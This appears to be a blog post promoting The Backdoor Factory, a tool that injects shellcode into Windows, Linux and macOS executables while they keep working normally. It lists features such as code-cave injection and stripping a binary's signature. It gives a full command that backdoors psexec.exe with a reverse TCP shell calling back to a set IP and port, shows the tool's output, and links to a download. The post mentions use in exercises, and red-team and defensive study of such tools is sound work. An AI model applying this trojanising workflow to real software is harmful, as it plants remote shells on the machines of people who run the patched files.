The Backdoor Factory or BDF is a tool which enables you to patch binaries with shellcode and continue normal execution exactly as the executable binary would have in its’ pre-patched state.
Some executables have built in protection, as such this tool will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises.
There’s a couple of somewhat related tools you can also check out:
– peinjector – MITM PE File Injector
– PEiD – Detect PE Packers, Cryptors & Compilers
Features of Backdoor Factory
Overall BDF Features
Overall BDF Features
The user can:
- Provide custom shellcode.
- Patch a directory of executables/dlls.
- Select x32 or x64 binaries to patch only.
- Include BDF is other python projects see pebin.py and elfbin.py
PE File Related Backdoor-Factory Features
- Can find all codecaves in an EXE/DLL.
- By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
- Can inject shellcode into code caves or into a new section.
- Can find if a PE binary needs to run with elevated privileges.
- When selecting code caves, you can use the following commands:
- Jump (j), for code cave jumping
- Single (s), for patching all your shellcode into one cave
- Append (a), for creating a code cave
- Ignore (i or q), nevermind, ignore this binary
- Can ignore DLLs
- Import Table Patching
- AutoPatching (-m automtic)
- Onionduke (-m onionduke)
ELF Files Backdoor Feature
Extends 1000 bytes (in bytes) to the TEXT SEGMENT and injects shellcode into that section of code.
Mach-O Files
Pre-Text Section patching and signature removal
The Backdoor Factory Usage
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp [*] In the backdoor module [*] Checking if binary is supported [*] Gathering file info [*] Reading win32 entry instructions [*] Looking for and setting selected shellcode [*] Creating win32 resume execution stub [*] Looking for caves that will fit the minimum shellcode length of 402 [*] All caves lengths: (402,) ############################################################ The following caves can be used to inject code and possibly continue execution. **Don't like what you see? Use jump, single, append, or ignore.** ############################################################ [*] Cave 1 length as int: 402 [*] Available caves: 1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507 2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492 3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501 4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492 5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505 6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498 7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495 8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505 9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559 10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559 ************************************************** [!] Enter your selection: 5 Using selection: 5 [*] Changing Section Flags [*] Patching initial entry instructions [*] Creating win32 resume execution stub [*] Overwriting certificate table pointer [*] psexec.exe backdooring complete File psexec.exe is in the 'backdoored' directory |
You can download Backdoor Factory here:
the-backdoor-factory-3.4.2.zip
Or read more here.